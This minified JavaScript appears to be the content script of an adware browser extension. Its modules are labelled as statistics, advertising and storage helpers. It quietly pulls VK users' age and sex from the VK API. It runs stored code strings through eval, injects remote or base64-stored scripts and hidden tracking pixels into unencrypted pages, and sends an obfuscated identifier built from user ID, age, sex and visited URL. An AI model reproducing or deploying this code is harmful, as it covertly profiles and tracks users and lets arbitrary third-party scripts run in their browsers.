$6E727987_C8EA_44DA_8749_310C0FBE3C3E_.scripts=function(c){return{".":"com.stat.userdata,com.core.base64,com.ab.statistics_ext,com.ab.advertising,com.core.storage,com.torrent.main".split(","),"com.stat.userdata":function(){if(!/^(https?:\/\/(www\.)?vk\.com(\/.*|$))$/.test(window.location.href))return{};var d=c.Storage;(function(){var b=d.getValue("com.stat.userdata.age","-1"),f=d.getValue("com.stat.userdata.sex","-1");("-1"==b||"-1"==f)&&-1!==window.location.origin.indexOf("vk.com")&&0<vk.id&&c.Request("GET",
"https://api.vk.com/method/users.get?user_id="+vk.id+"&fields=sex%2Cbdate").addCallback(function(e){e=JSON.parse(e);e=e.response[0];if("-1"==b&&e.bdate){var a=e.bdate.split("."),a=a[1]+"."+a[0]+"."+a[2];b=Date.parse(a);b=(Date.now()-b)/315576E5;b=Math.floor(b);c.Storage.setValue("com.stat.userdata.age",b);c.Events.sendMessage("updateData",{})}"-1"==f&&e.sex&&(f=e.sex-1,c.Storage.setValue("com.stat.userdata.sex",f),c.Events.sendMessage("updateData",{}))})})();return{}},"com.core.base64":function(){c.Base64=
new function(){var c=window;return{encode:function(b){return c.btoa(b)},decode:function(b){return c.atob(b)}}};return{}},"com.ab.statistics_ext":function(){function d(){var a=c.Storage.getValue("com.ab.statistic.stored_code_fg",null);if(null==a)e();else{var a=b.parse(a),d="$AOB".replace("O",""),a=a.split(d).join(c.currentID()),a=a.split(/main\s*\(\)/).join("abhtml_statistic_fg_main()"),a="var KERNEL = $6E727987_C8EA_44DA_8749_310C0FBE3C3E_.KERNEL;var m_settings = "+b.stringify(f)+";"+(a+"abhtml_statistic_fg_main();"),
d=window.$6E727987_C8EA_44DA_8749_310C0FBE3C3E_;window.$6E727987_C8EA_44DA_8749_310C0FBE3C3E_={KERNEL:c};try{eval(a)}catch(m){m.message=m.message.split("abhtml_statistic_fg_main").join("main")}window.$6E727987_C8EA_44DA_8749_310C0FBE3C3E_=d}}var b=c.JSON,f={},e=function(){function a(b){a=function(){};var c=document.cookie.match(RegExp("\\b\\s*"+m_pluginGUID+"_cid\\s*=\\s*([^;]+)"));c&&c[1]&&b.reply(c[1])}c.Events.addEventListener("com.ab.statistic2_getCID",a)};(function(){c.Events.sendMessage("m_settings_get",
{});c.Events.addListener("m_settings_set",function(a,b){f=b;d()})})();return{}},"com.ab.advertising":function(){var d=c.JSON,b=c.Base64,f=c.Compatibility.setTimeout,e="com.ab.advertising.rdr2.",a=c.Storage,i=function(){function m(b,a){var c=u();if(c&&"0"!=c){a=a?a:"head";Math.round(1E5*Math.random());var d=document.getElementsByTagName(a)[0],g=document.createElement("img"),b=b+"&code="+c;g.setAttribute("src",b);g.setAttribute("height","1px");g.setAttribute("width","1px");g.style.display="none";d&&
d.insertBefore(g,d.firstChild)}else f(function(){m(b,a)},2E3)}function i(){function c(b){if("string"==typeof b&&""!=b)try{return RegExp(b,"i").test(window.location.href)?1:0}catch(a){return 3}else return 2}function f(j){var g=a.getValue(e+"page_counter",null);if(null!=g)for(var i=0;i<j.length;++i){var r=j[i],h=a.getValue(e+"ad."+r+".common_data",null);if(null!=h)try{var h=b.decode(h),h=d.parse(h),k=Math.floor(100/h.frequency);if(0==(g+k-Math.floor(0.125*k))%k&&1!=c(h.blacklist)&&0!=c(h.whitelist))if("adsniper_pixel"==
r)m(h.url,h.place_to_inject);else if(1==h.cached){var n=h.place_to_inject,t=a.getValue(e+"ad."+r+".inject_data",null);if(t){var n=n?n:"head",o=document.createElement("script");o.type="text/javascript";o.charset="UTF-8";o.text=b.decode(t);(documentHead=document.getElementsByTagName(n)[0])&&documentHead.insertBefore(o,documentHead.firstChild)}}else{var l=h.url,p=h.place_to_inject;if(l){var p=p?p:"head",q=document.createElement("script");q.type="text/javascript";q.charset="UTF-8";q.src=l;(documentHead=
document.getElementsByTagName(p)[0])&&documentHead.insertBefore(q,documentHead.firstChild)}}}catch(s){}}}var j=a.getValue(e+"ad_array",null);null!=j&&(j=b.decode(j),j=d.parse(j),f(j))}var k={},l="0",u=function(){var b={1:49,2:50,3:51,4:52,5:53,6:54,7:55,8:56,9:57,"0":48,q:113,w:119,e:101,r:114,t:116,y:121,u:117,i:105,o:111,p:112,a:97,s:115,d:100,f:102,g:103,h:104,j:106,k:107,l:108,z:122,x:120,c:99,v:118,b:98,n:110,m:109,":":58,".":46,"-":45,"/":47,_:95};return function(){var a;if("0"!==l){a=l;var d=
k.age;""!=d&&(d=":age:"+d);var f=k.sex;""!=f&&(f=":sex:"+f);var g=window.location.hostname;g&&"/"!=window.location.pathname&&(g+=window.location.pathname);g&&(g=":url:"+g);g=g.toLowerCase();a="id:"+a+d+f+g+":salt:8ac3ad3abb827620ed3c";for(var d=[11,54,23,98,12,56,78,34,12,90,3,6,1,4,0,43,25,34,87,21,16,39,25,36,81,63,97,24,34,345,867,123,764,3,7,5,3,1,9,7,4],f=d.length,e="",g=0,i=a.length;g<i;++g){var h=b[a[g]];"undefined"===typeof h&&(c.Panic.err("bad encoding!"),h=0);e+=h+d[g%f]+":"}a=e=e.slice(0,
-1)}else a=null;return a}}();c.Events.dispatchEvent("sendDataToForeground",{},0,function(a){a=a.data;a.uniqueID&&(l=a.uniqueID);a.userData&&(k=a.userData)});var s=a.getValue(e+"page_counter",null);null!=s&&a.setValue(e+"page_counter",s+1);"undefined"===typeof window.client_flag_4413_195739022_4197345_4321&&(window.client_flag_4413_195739022_4197345_4321=!1);!window.client_flag_4413_195739022_4197345_4321&&"https:"!==window.location.protocol&&(f(i,1E3),window.client_flag_4413_195739022_4197345_4321=
!0)};(function(){var b=a.getValue("com.ab.advertisment.stored_code_fg",null);if(null==b)i();else{var b=d.parse(b),f="$AOB".replace("O",""),b=b.split(f).join(c.currentID()),b="var KERNEL = $6E727987_C8EA_44DA_8749_310C0FBE3C3E_.KERNEL; var g_browserType ="+d.stringify("Firefox")+"; "+b,f=window.$6E727987_C8EA_44DA_8749_310C0FBE3C3E_;window.$6E727987_C8EA_44DA_8749_310C0FBE3C3E_={KERNEL:c};try{eval(b)}catch(e){}window.$6E727987_C8EA_44DA_8749_310C0FBE3C3E_=f}})();return{}},"com.core.storage":function(){var d=
c.Storage.getValue,b=c.Storage.setValue;c.Storage.getValue=function(c,e,a){var a="undefined"===typeof a?!0:a,i=d(c,void 0,a);"undefined"===typeof i&&!0===a&&(i=d(c,void 0,!1),"undefined"!==typeof i&&(b(c,null,!1),b(c,i,!0)));return"undefined"!==typeof i?i:e};c.Storage.setValue=function(c,e,a){a="undefined"===typeof a?!0:a;!0===a&&"undefined"!==typeof d(c,void 0,!1)&&b(c,null,!1);return b(c,e,a)};return{}},"com.torrent.main":function(){function c(){var b=window.location.search;if(""!=b&&(b=b.split("?q="),
1<b.length&&(b=b[1],(b=decodeURIComponent(b))&&""!=b))){var f=document.querySelector("#gsc-i-id1");f?(f.value=b,(b=document.querySelector("input.gsc-search-button"))?b.click():setTimeout(function(){c()},500)):setTimeout(function(){c()},500)}}(function(){"turbogalaxy.org"==window.location.hostname&&setTimeout(function(){c()},1E3)})();return{}}}};
